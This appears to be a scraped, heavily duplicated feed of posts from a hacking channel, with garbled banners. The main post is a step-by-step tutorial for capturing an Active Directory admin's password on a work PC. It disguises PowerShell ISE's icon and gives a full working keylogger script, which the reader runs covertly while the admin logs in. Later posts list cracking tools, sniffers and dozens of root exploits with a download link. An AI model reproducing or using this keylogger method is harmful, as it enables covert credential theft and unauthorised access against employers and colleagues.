β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦βοΈHow to get an admin password on a work PC in an Active Directory domain?
A) we will tell you about the method by which we can get the admin password in the Active Directory domain of your organization. It can be used to install, uninstall software, disable antivirus, access many corporate domain resources, access documents of other users on their PCs, and much more delicious. Well, first things first.
!) First, we find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example a folder icon or an icon of software allowed in the organization in * .ico format, for example 1C. I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.
π¦Then open Windows PowerShell ISE and copy the keylogger script code:
#requires -Version 2
function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")
{
# Signatures for API Calls
$ signatures = @ '
[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
public static extern short GetAsyncKeyState (int virtualKeyCode);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int GetKeyboardState (byte [] keystate);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int MapVirtualKey (uint uCode, int uMapType);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# load signatures and make members available
$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru
# create output file
$ null = New-Item -Path $ Path -ItemType File -Force
try
{
Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red
# create endless loop. When user presses CTRL + C, finally-block
# executes and shows the collected key presses
while ($ true) {
Start-Sleep -Milliseconds 40
# scan all ASCII codes above 8
for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {
# get current key state
$ state = $ API :: GetAsyncKeyState ($ ascii)
# is key pressed?
if ($ state -eq -32767) {
$ null = [console] :: CapsLock
# translate scan code to real code
$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)
# get keyboard state for virtual keys
$ kbstate = New-Object Byte [] 256
$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)
# prepare a StringBuilder to receive input key
$ mychar = New-Object -TypeName System.Text.StringBuilder
# translate virtual key
$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)
if ($ success)
{
# add key to logger file
[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)
}
}
}
}
}
finally
{
# open logger file in Notepad
notepad $ Path
}
}
# records all key presses until script is aborted by pressing CTRL + C
# will then open the file with collected key codes
Start-KeyLogger
π¦βοΈHow to get an admin password on a work PC in an Active Directory domain?
A) we will tell you about the method by which we can get the admin password in the Active Directory domain of your organization. It can be used to install, uninstall software, disable antivirus, access many corporate domain resources, access documents of other users on their PCs, and much more delicious. Well, first things first.
!) First, we find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example a folder icon or an icon of software allowed in the organization in * .ico format, for example 1C. I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.
π¦Then open Windows PowerShell ISE and copy the keylogger script code:
#requires -Version 2
function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")
{
# Signatures for API Calls
$ signatures = @ '
[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
public static extern short GetAsyncKeyState (int virtualKeyCode);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int GetKeyboardState (byte [] keystate);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int MapVirtualKey (uint uCode, int uMapType);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# load signatures and make members available
$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru
# create output file
$ null = New-Item -Path $ Path -ItemType File -Force
try
{
Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red
# create endless loop. When user presses CTRL + C, finally-block
# executes and shows the collected key presses
while ($ true) {
Start-Sleep -Milliseconds 40
# scan all ASCII codes above 8
for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {
# get current key state
$ state = $ API :: GetAsyncKeyState ($ ascii)
# is key pressed?
if ($ state -eq -32767) {
$ null = [console] :: CapsLock
# translate scan code to real code
$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)
# get keyboard state for virtual keys
$ kbstate = New-Object Byte [] 256
$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)
# prepare a StringBuilder to receive input key
$ mychar = New-Object -TypeName System.Text.StringBuilder
# translate virtual key
$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)
if ($ success)
{
# add key to logger file
[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)
}
}
}
}
}
finally
{
# open logger file in Notepad
notepad $ Path
}
}
# records all key presses until script is aborted by pressing CTRL + C
# will then open the file with collected key codes
Start-KeyLogger
Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, run our script with the Run script command or with the F5 button and minimize the window
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hackers crack 16-bit passwords within 1 hour and hash password security research :
1) Anti-virus research information security professionals said that hackers cracking passwords are as straightforward and simple as our clients use . Avastβs AntonΓn HΓ½ΕΎa has been engaged in password security research for many years.
2) He has collected nearly 40,000 password samples and found that only 10% of the passwords in these samples are βbeyond the level that can be guessed and cracked under normal circumstancesβ. It can be cracked very easily. In these samples, almost no password contains uppercase English characters , although software security experts often remind you to use a mixture of uppercase and lowercase characters to set the password (finally know why Appleβs password must be uppercase, lowercase and then add numbers. ). And usually these passwords have an average length of 6 characters , and only 52 passwords exceed 12 characters. The frequently mentioned passwords use some special characters , but there are only a handful of people who really set this format.
3) A hacker group recently tried to crack more than 14,800 random passwords. Each hacker has a success rate of 62% to 90% , and successfully cracked 90% of the hash code in less than an hour by using a computer cluster . It is reported that the hacker group serves the ArsTechnica website. In order to better study the hacking strategy, they also published a method to crack the password. In addition to repeatedly entering passwords and passwords on the website, the hacker team also tried to obtain a series of hashed passwords online.
4) The hashing method makes it difficult for hackers to return to the password from the hash table, and it also allows the website to store a series of hashes instead of storing them as low-security text passwords. This means that even if the hashed password is stolen, the real plain text password will still be stored securely .
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hackers crack 16-bit passwords within 1 hour and hash password security research :
1) Anti-virus research information security professionals said that hackers cracking passwords are as straightforward and simple as our clients use . Avastβs AntonΓn HΓ½ΕΎa has been engaged in password security research for many years.
2) He has collected nearly 40,000 password samples and found that only 10% of the passwords in these samples are βbeyond the level that can be guessed and cracked under normal circumstancesβ. It can be cracked very easily. In these samples, almost no password contains uppercase English characters , although software security experts often remind you to use a mixture of uppercase and lowercase characters to set the password (finally know why Appleβs password must be uppercase, lowercase and then add numbers. ). And usually these passwords have an average length of 6 characters , and only 52 passwords exceed 12 characters. The frequently mentioned passwords use some special characters , but there are only a handful of people who really set this format.
3) A hacker group recently tried to crack more than 14,800 random passwords. Each hacker has a success rate of 62% to 90% , and successfully cracked 90% of the hash code in less than an hour by using a computer cluster . It is reported that the hacker group serves the ArsTechnica website. In order to better study the hacking strategy, they also published a method to crack the password. In addition to repeatedly entering passwords and passwords on the website, the hacker team also tried to obtain a series of hashed passwords online.
4) The hashing method makes it difficult for hackers to return to the password from the hash table, and it also allows the website to store a series of hashes instead of storing them as low-security text passwords. This means that even if the hashed password is stolen, the real plain text password will still be stored securely .
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What Is IP Spoofing Data is transferred via the internet through "packets." An IP (Internet Protocol) address is a unique code that each computer has that identifies the machine these packets are being sent from. IP addresses can be used to identify where a computer is connecting from. In many cases IP look-up services such as whois.com can provide information about who may be using the computer that is associated with an IP address. IP Spoofing is the process of using a fake or random IP address in an attempt to mask where a computer is connecting from or which computer is connecting to a network.
Why IP Spoofing Happens As the internet has grown in scope and usability, so too has the network of individuals who would seek to manipulate internet network protocols for criminal and malicious purposes. Not all cases of IP spoofing are of malevolent intent; for example, some people choose to spoof their IP addresses when going to web sites that the believe have politically or morally questionable content, in fear that their IP address will be saved and they may one day be associated with unpopular causes or viewpoints. However, a significant percentage of IP spoofing happens because those with dubious intent seek to disguise the source of their attacks.
For example, individuals or groups coordinating denial of service (DOS) attacks will often send a barrage of traffic in the form of fake or random IP addresses to certain websites or networks in an attempt to render the sever or servers hosting the sites incapable of processing the traffic, and thus anonymously shutting down the website or network.
Another common use of IP spoofing is the circumvention of user authentication based on IP address or region. For instance, many corporations use an intranet. In order to access all the content on this intranet, the machines requesting access must have an IP address within a specified valid range that shows it is recognized as a trusted machine or the machine is being access from a trusted location. By spoofing a connection from a trusted machine, individuals are able to bypass this authentication method and illegally access the network.
Ways To Protect Yourself Against IP Spoofing IP spoofing can allow an outside party to steal sensitive information or inflict damage on your network. Fortunately, there are a few ways that you can protect yourself against this menace.
The first step you should take is to eliminate host-based authentication on your network. Host-based authentication uses the public host key of the client machine to authenticate a user. Rely instead on network encryption, which sends encrypted packets over a network.
https://github.com/greenarmor/Net-Spoofing-tool
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What Is IP Spoofing Data is transferred via the internet through "packets." An IP (Internet Protocol) address is a unique code that each computer has that identifies the machine these packets are being sent from. IP addresses can be used to identify where a computer is connecting from. In many cases IP look-up services such as whois.com can provide information about who may be using the computer that is associated with an IP address. IP Spoofing is the process of using a fake or random IP address in an attempt to mask where a computer is connecting from or which computer is connecting to a network.
Why IP Spoofing Happens As the internet has grown in scope and usability, so too has the network of individuals who would seek to manipulate internet network protocols for criminal and malicious purposes. Not all cases of IP spoofing are of malevolent intent; for example, some people choose to spoof their IP addresses when going to web sites that the believe have politically or morally questionable content, in fear that their IP address will be saved and they may one day be associated with unpopular causes or viewpoints. However, a significant percentage of IP spoofing happens because those with dubious intent seek to disguise the source of their attacks.
For example, individuals or groups coordinating denial of service (DOS) attacks will often send a barrage of traffic in the form of fake or random IP addresses to certain websites or networks in an attempt to render the sever or servers hosting the sites incapable of processing the traffic, and thus anonymously shutting down the website or network.
Another common use of IP spoofing is the circumvention of user authentication based on IP address or region. For instance, many corporations use an intranet. In order to access all the content on this intranet, the machines requesting access must have an IP address within a specified valid range that shows it is recognized as a trusted machine or the machine is being access from a trusted location. By spoofing a connection from a trusted machine, individuals are able to bypass this authentication method and illegally access the network.
Ways To Protect Yourself Against IP Spoofing IP spoofing can allow an outside party to steal sensitive information or inflict damage on your network. Fortunately, there are a few ways that you can protect yourself against this menace.
The first step you should take is to eliminate host-based authentication on your network. Host-based authentication uses the public host key of the client machine to authenticate a user. Rely instead on network encryption, which sends encrypted packets over a network.
https://github.com/greenarmor/Net-Spoofing-tool
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
greenarmor/Net-Spoofing-tool
Net Spoofing is obviously not legal and not intended to be use in any public and private network, eg. corporate or other non-residential networks, to do so is considered malicious-Cracking to the...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to defend against Sniffer attacks ?
1) Autosniffer is a tool developed by the well-known hacker organization (now a security company) L0pht. It is used to detect whether there is a machine in the local network in promiscuous mode (that is, listening mode).
2) A machine in promiscuous mode means that it has probably been hacked and Sniffer installed. It is very important for network administrators to understand which machine is in promiscuous mode for further investigation.
3) Antisniff 1.X version runs in the WindOWS NT system of Ethernet and provides a simple and easy-to-use graphical user interface. The tool tests whether the remote system is capturing and analyzing data packets that are not sent to it in a variety of ways. These test methods have nothing to do with the operating system itself.
4) Antisniff runs on a network segment of the local Ethernet. If it runs in a non-switched Class C network, Antisniff can monitor the entire network; if the network switches are isolated according to working groups, each working group needs to run an Antisniff. The reason is that some special tests use invalid Ethernet addresses, and some tests require statistics in promiscuous mode (such as response time, packet loss rate, etc.).
5) The usage of Antisniff is very simple, select the machine to be checked in the graphical interface of the tool, and specify the checking frequency. For tests other than network response time checks, each machine will return a certain positive or negative value. The returned positive value indicates that the machine is in promiscuous mode, which may have already been installed Sniffer.
6) For the return value of the network response time test, it is recommended to calculate the standard value based on the value returned for the first time, and then check the machine that has a large change in the results returned during the two tests of flood and non-flood. Once these machines exit promiscuous mode and return to normal operation mode, the next test of Antisniff will record the difference (positive value) between promiscuous mode and non-promiscuous mode.
7) Antisniff should be run periodically. The specific period value varies according to different sites, different network loads, the number of machines tested, and website strategies.
https://github.com/LYSYyy/AutoSniff
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to defend against Sniffer attacks ?
1) Autosniffer is a tool developed by the well-known hacker organization (now a security company) L0pht. It is used to detect whether there is a machine in the local network in promiscuous mode (that is, listening mode).
2) A machine in promiscuous mode means that it has probably been hacked and Sniffer installed. It is very important for network administrators to understand which machine is in promiscuous mode for further investigation.
3) Antisniff 1.X version runs in the WindOWS NT system of Ethernet and provides a simple and easy-to-use graphical user interface. The tool tests whether the remote system is capturing and analyzing data packets that are not sent to it in a variety of ways. These test methods have nothing to do with the operating system itself.
4) Antisniff runs on a network segment of the local Ethernet. If it runs in a non-switched Class C network, Antisniff can monitor the entire network; if the network switches are isolated according to working groups, each working group needs to run an Antisniff. The reason is that some special tests use invalid Ethernet addresses, and some tests require statistics in promiscuous mode (such as response time, packet loss rate, etc.).
5) The usage of Antisniff is very simple, select the machine to be checked in the graphical interface of the tool, and specify the checking frequency. For tests other than network response time checks, each machine will return a certain positive or negative value. The returned positive value indicates that the machine is in promiscuous mode, which may have already been installed Sniffer.
6) For the return value of the network response time test, it is recommended to calculate the standard value based on the value returned for the first time, and then check the machine that has a large change in the results returned during the two tests of flood and non-flood. Once these machines exit promiscuous mode and return to normal operation mode, the next test of Antisniff will record the difference (positive value) between promiscuous mode and non-promiscuous mode.
7) Antisniff should be run periodically. The specific period value varies according to different sites, different network loads, the number of machines tested, and website strategies.
https://github.com/LYSYyy/AutoSniff
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
LYSYyy/AutoSniff
Best sniffing tools! Contribute to LYSYyy/AutoSniff development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HACKING SNIFFERS :
http://www.monitis.com/
https://www.wireshark.org/
https://www.manageengine.com/products/netflow/
https://www.liveaction.com/products/omnipeek-network-protocol-analyzer/
http://www.tcpdump.org/
https://www.winpcap.org/windump/
https://www.wireshark.org/docs/man-pages/tshark.html
http://www.netresec.com/?page=NetworkMiner
https://www.telerik.com/download/fiddler
https://www.colasoft.com/download/products/capsa_free.php
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HACKING SNIFFERS :
http://www.monitis.com/
https://www.wireshark.org/
https://www.manageengine.com/products/netflow/
https://www.liveaction.com/products/omnipeek-network-protocol-analyzer/
http://www.tcpdump.org/
https://www.winpcap.org/windump/
https://www.wireshark.org/docs/man-pages/tshark.html
http://www.netresec.com/?page=NetworkMiner
https://www.telerik.com/download/fiddler
https://www.colasoft.com/download/products/capsa_free.php
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
TeamViewer
Remote Management | TeamViewer
Efficiently centralize, monitor, and manage your IT support with remote monitoring and management (RMM). Discover TeamViewer Remote Management.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ALL POPULAR CRACKING TOOLS USED BY HACKERS IN 2020 :
https://hashcat.net/hashcat/
https://www.darknet.org.uk/2006/09/brutus-password-cracker-download-brutus-aet2zip-aet2/
http://www.openwall.com/john/
https://www.thc.org/thc-hydra/
http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
http://project-rainbowcrack.com/
http://ophcrack.sourceforge.net/tables.php
http://www.l0phtcrack.com/
http://www.aircrack-ng.org/
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ALL POPULAR CRACKING TOOLS USED BY HACKERS IN 2020 :
https://hashcat.net/hashcat/
https://www.darknet.org.uk/2006/09/brutus-password-cracker-download-brutus-aet2zip-aet2/
http://www.openwall.com/john/
https://www.thc.org/thc-hydra/
http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
http://project-rainbowcrack.com/
http://ophcrack.sourceforge.net/tables.php
http://www.l0phtcrack.com/
http://www.aircrack-ng.org/
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
hashcat.net
hashcat - advanced password recovery
World's fastest and most advanced password recovery utility
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ALL THOSE SHELLS FREE :
AIX-0days.txt AIX 4.2 local root vulnerabilities
leehseinloong.cpp Sudoku2 exploit written for Lee Hsien Loong. (.sg PM)
linux-ia32.c Linux Kernel 2.6.32 ia32entry emulation x86_64 exploit
lotus_exp.py Lotus Domino IMAP4 Server Release 6.5.4 win2k remote exploit
mikrotik-jailbreak.txt Mikrotik 6.40 & below "telnet" jailbreak exploit
mirc-DoS-Script.ini Mirc 6.12 & 6.11 denial-of-service IRC script
mobileiron0day.txt MobileIron Virtual Smartphone Platform local root exploit
MobileIronBypass.tgz MobileIron mobile device management jailbreak detection bypass
mulftpdos.zip Serv-U / G6 / WarFTPD denial-of-service exploit in asm
neogeox.txt NeoGeo Gold X games console jailbreak via UART root shell
NetBSD-sa-2016-003-howto-abuse-cpp.png NetBSD 6.1.5 calendar local root exploit PoC
openbsd-0day-cve-2018-14665.sh OpenBSD 6.4 Xorg local root exploit
prdelka-vs-AEP-smartgate.c AEP Smartgate V4.3B arbitrary file download exploit
prdelka-vs-APPLE-chpass.sh OS-X 10.6.3 & below chpass arbitrary file creation exploit
prdelka-vs-APPLE-ptracepanic.c OS-X 10.6.1 & below ptrace() mutex handling kernel panic
prdelka-vs-BSD-ptrace.tar.gz NetBSD 2.1 ptrace() local root exploit
prdelka-vs-CISCO-httpdos.zip Cisco IOS 12.2 & below HTTP denial-of-service exploit
prdelka-vs-CISCO-vpnftp.c Cisco VPN Concentrator 3000 FTP remote exploit
prdelka-vs-GNU-adabas2.txt Adabas D 13.01 SQL injection & directory traversal
prdelka-vs-GNU-adabas.c Adabas D 13.01 local root exploit Linux
prdelka-vs-GNU-chpasswd.c SquirrelMail 3.1 Change_passwd plugin & below local root exploit
prdelka-vs-GNU-citadel.tar.gz Citadel SMTP 7.10 & below remote code execution exploit
prdelka-vs-GNU-exim.c Exim 4.43-r2 & below host_aton() local root exploit (Linux)
prdelka-vs-GNU-lpr.c Slackware 1.01 stack overflow local root exploit (Linux)
prdelka-vs-GNU-mbsebbs.c mbse-bbs 0.70.0 & below local root exploit (Linux)
prdelka-vs-GNU-peercast.c PeerCast v0.1216 remote root exploit (linux)
prdelka-vs-GNU-sudo.c sudo 1.6.8p9 race condition local root exploit (Linux)
prdelka-vs-GNU-tin.c Slackware 1.01 local root exploit (Linux)
prdelka-vs-HPUX-libc.c HP-UX 11.11 & below libc local root exploit (hppa)
prdelka-vs-HPUX-swask.c HP-UX 11.11 & below swask format string local root exploit (hppa)
prdelka-vs-HPUX-swmodify.c HP-UX 11.11 & below swmodify local root exploit (hppa)
prdelka-vs-HPUX-swpackage.c HP-UX 11.11 & below swpackage local root exploit (hppa)
prdelka-vs-http-fuzz.tar.gz HTTP fuzzing tool & example Savant 3.1 vulnerability
prdelka-vs-LINUS-fchown.tar Linux kernel 2.4.x/2.6.6 & below fchown() file ownership exploit
prdelka-vs-MISC-massftp.tar.gz Mass scanning ftp exploiter tool
prdelka-vs-MS-hotmail.txt Microsoft Hotmail Authentication Bypass vulnerability
prdelka-vs-MS-IE-6.0.2800.1106.XPSP1.rar Internet Explorer 6.0 IFRAME Windows XP exploit
prdelka-vs-MS-rshd.tar.gz Windows RSH daemon 1.8 & below remote exploit
prdelka-vs-MS-winzip.c WinZip 10.0.7245 Win32 & below exploit (the one that angered CERT)
prdelka-vs-SCO-enable SCO OpenServer 5.0.7 enable local root exploit
prdelka-vs-SCO-netwarex.c SCO OpenServer 5.0.7 netware printing local "lp" exploit
prdelka-vs-SCO-ptrace.c SCO Unixware 7.1.3 ptrace() linux kernel emulation local root exploit
prdelka-vs-SCO-tcpdos SCO OpenServer 5.0.7 TCP RST denial-of-service exploit
prdelka-vs-SCO-termshx.c SCO OpenServer 5.0.7 termsh local gid "auth" exploit
prdelka-vs-SGI-xrunpriv SGI IRIX 6.5 runpriv local root exploit
prdelka-vs-SUN-sysinfo.c Solaris 10 sysinfo() local kernel memory information leak
prdelka-vs-SUN-telnetd.c Solaris in.telnetd 8.0 & 7.0 remote exploit (sparc)
prdelka-vs-SUN-virtualbox.sh Sun VirtualBox 3.0.6 local root exploit
prdelka-vs-THC-vmap THC vmap DoS exploit
prdelka-vs-UNIX-permissions.tar.gz UNIX file permissions generic directory exploit
DOWNLOAD :
https://github.com/hackerhouse-opensource/exploits
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ALL THOSE SHELLS FREE :
AIX-0days.txt AIX 4.2 local root vulnerabilities
leehseinloong.cpp Sudoku2 exploit written for Lee Hsien Loong. (.sg PM)
linux-ia32.c Linux Kernel 2.6.32 ia32entry emulation x86_64 exploit
lotus_exp.py Lotus Domino IMAP4 Server Release 6.5.4 win2k remote exploit
mikrotik-jailbreak.txt Mikrotik 6.40 & below "telnet" jailbreak exploit
mirc-DoS-Script.ini Mirc 6.12 & 6.11 denial-of-service IRC script
mobileiron0day.txt MobileIron Virtual Smartphone Platform local root exploit
MobileIronBypass.tgz MobileIron mobile device management jailbreak detection bypass
mulftpdos.zip Serv-U / G6 / WarFTPD denial-of-service exploit in asm
neogeox.txt NeoGeo Gold X games console jailbreak via UART root shell
NetBSD-sa-2016-003-howto-abuse-cpp.png NetBSD 6.1.5 calendar local root exploit PoC
openbsd-0day-cve-2018-14665.sh OpenBSD 6.4 Xorg local root exploit
prdelka-vs-AEP-smartgate.c AEP Smartgate V4.3B arbitrary file download exploit
prdelka-vs-APPLE-chpass.sh OS-X 10.6.3 & below chpass arbitrary file creation exploit
prdelka-vs-APPLE-ptracepanic.c OS-X 10.6.1 & below ptrace() mutex handling kernel panic
prdelka-vs-BSD-ptrace.tar.gz NetBSD 2.1 ptrace() local root exploit
prdelka-vs-CISCO-httpdos.zip Cisco IOS 12.2 & below HTTP denial-of-service exploit
prdelka-vs-CISCO-vpnftp.c Cisco VPN Concentrator 3000 FTP remote exploit
prdelka-vs-GNU-adabas2.txt Adabas D 13.01 SQL injection & directory traversal
prdelka-vs-GNU-adabas.c Adabas D 13.01 local root exploit Linux
prdelka-vs-GNU-chpasswd.c SquirrelMail 3.1 Change_passwd plugin & below local root exploit
prdelka-vs-GNU-citadel.tar.gz Citadel SMTP 7.10 & below remote code execution exploit
prdelka-vs-GNU-exim.c Exim 4.43-r2 & below host_aton() local root exploit (Linux)
prdelka-vs-GNU-lpr.c Slackware 1.01 stack overflow local root exploit (Linux)
prdelka-vs-GNU-mbsebbs.c mbse-bbs 0.70.0 & below local root exploit (Linux)
prdelka-vs-GNU-peercast.c PeerCast v0.1216 remote root exploit (linux)
prdelka-vs-GNU-sudo.c sudo 1.6.8p9 race condition local root exploit (Linux)
prdelka-vs-GNU-tin.c Slackware 1.01 local root exploit (Linux)
prdelka-vs-HPUX-libc.c HP-UX 11.11 & below libc local root exploit (hppa)
prdelka-vs-HPUX-swask.c HP-UX 11.11 & below swask format string local root exploit (hppa)
prdelka-vs-HPUX-swmodify.c HP-UX 11.11 & below swmodify local root exploit (hppa)
prdelka-vs-HPUX-swpackage.c HP-UX 11.11 & below swpackage local root exploit (hppa)
prdelka-vs-http-fuzz.tar.gz HTTP fuzzing tool & example Savant 3.1 vulnerability
prdelka-vs-LINUS-fchown.tar Linux kernel 2.4.x/2.6.6 & below fchown() file ownership exploit
prdelka-vs-MISC-massftp.tar.gz Mass scanning ftp exploiter tool
prdelka-vs-MS-hotmail.txt Microsoft Hotmail Authentication Bypass vulnerability
prdelka-vs-MS-IE-6.0.2800.1106.XPSP1.rar Internet Explorer 6.0 IFRAME Windows XP exploit
prdelka-vs-MS-rshd.tar.gz Windows RSH daemon 1.8 & below remote exploit
prdelka-vs-MS-winzip.c WinZip 10.0.7245 Win32 & below exploit (the one that angered CERT)
prdelka-vs-SCO-enable SCO OpenServer 5.0.7 enable local root exploit
prdelka-vs-SCO-netwarex.c SCO OpenServer 5.0.7 netware printing local "lp" exploit
prdelka-vs-SCO-ptrace.c SCO Unixware 7.1.3 ptrace() linux kernel emulation local root exploit
prdelka-vs-SCO-tcpdos SCO OpenServer 5.0.7 TCP RST denial-of-service exploit
prdelka-vs-SCO-termshx.c SCO OpenServer 5.0.7 termsh local gid "auth" exploit
prdelka-vs-SGI-xrunpriv SGI IRIX 6.5 runpriv local root exploit
prdelka-vs-SUN-sysinfo.c Solaris 10 sysinfo() local kernel memory information leak
prdelka-vs-SUN-telnetd.c Solaris in.telnetd 8.0 & 7.0 remote exploit (sparc)
prdelka-vs-SUN-virtualbox.sh Sun VirtualBox 3.0.6 local root exploit
prdelka-vs-THC-vmap THC vmap DoS exploit
prdelka-vs-UNIX-permissions.tar.gz UNIX file permissions generic directory exploit
DOWNLOAD :
https://github.com/hackerhouse-opensource/exploits
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - hackerhouse-opensource/exploits: exploits and proof-of-concept vulnerability demonstration files from the team at Hackerβ¦
exploits and proof-of-concept vulnerability demonstration files from the team at Hacker House - hackerhouse-opensource/exploits